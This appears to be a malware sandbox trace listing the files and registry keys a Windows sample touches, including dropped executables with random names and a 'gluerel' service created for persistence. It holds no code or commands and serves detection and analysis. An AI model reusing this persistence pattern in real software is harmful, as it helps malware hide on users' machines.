C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Windows
C:\Users\user\AppData\Local\Temp
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\SysWOW64\dafpanes.exe
C:\Users\user\AppData\Local\Temp\elVqUs.exe
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LDAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\elVqUs.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\OverrideFileSystemProperties
HKEY_CLASSES_ROOT\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_CLASSES_ROOT\ExplorerCLSIDFlags\{66742402-F9B9-11D1-A202-0000F81FEDEE}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\PropertyHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\PropertyHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MaxUndoItems
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Advanced\MaxUndoItems
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\elVqUs.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\elVqUs.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{2F711B17-773C-41D4-93FA-7F23EDCECB66}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceCopyACLWithFile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\{000214F9-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoEncryptOnMove
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gluerel\Environment
HKEY_CURRENT_USER
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\gluerel_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_USERS\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\LdapClientIntegrity
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseOldHostResolutionOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LDAP\UseHostnameAsAlias
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
